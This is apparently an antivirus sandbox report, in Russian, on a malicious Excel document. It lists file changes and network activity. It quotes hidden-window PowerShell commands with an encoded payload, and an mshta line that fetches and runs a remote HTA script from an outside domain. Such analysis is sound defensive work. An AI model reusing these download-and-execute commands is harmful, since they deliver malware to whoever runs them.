Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\mshta.exe' "C:\Users\Public\a.hta"
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\a.hta
- <Текущая директория>\8fd31000
Удаляет следующие файлы
- C:\users\public\a.hta
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
Сетевая активность
Подключается к
- 'pr###rcn.com':443
TCP
Другие
- 'pr###rcn.com':443
UDP
- DNS ASK pr###rcn.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' powershell -exEC byPass -w hidden -enC bQBzAGgAdABhACAAIgBoAHQAdABwAFMAOgAvAC8AcAByAG4AdABzAHIAYwBuAC4AYwBvAG0ALwB1AC4AaAB0AGEAIgA=' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' powershell -exEC byPass -w hidden -enC bQBzAGgAdABhACAAIgBoAHQAdABwAFMAOgAvAC8AcAByAG4AdABzAHIAYwBuAC4AYwBvAG0ALwB1AC4AaAB0AGEAIgA=
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -exEC byPass -w hidden -enC bQBzAGgAdABhACAAIgBoAHQAdABwAFMAOgAvAC8AcAByAG4AdABzAHIAYwBuAC4AYwBvAG0ALwB1AC4AaAB0AGEAIgA=
- '%WINDIR%\syswow64\mshta.exe' httpS://prntsrcn.com/u.hta
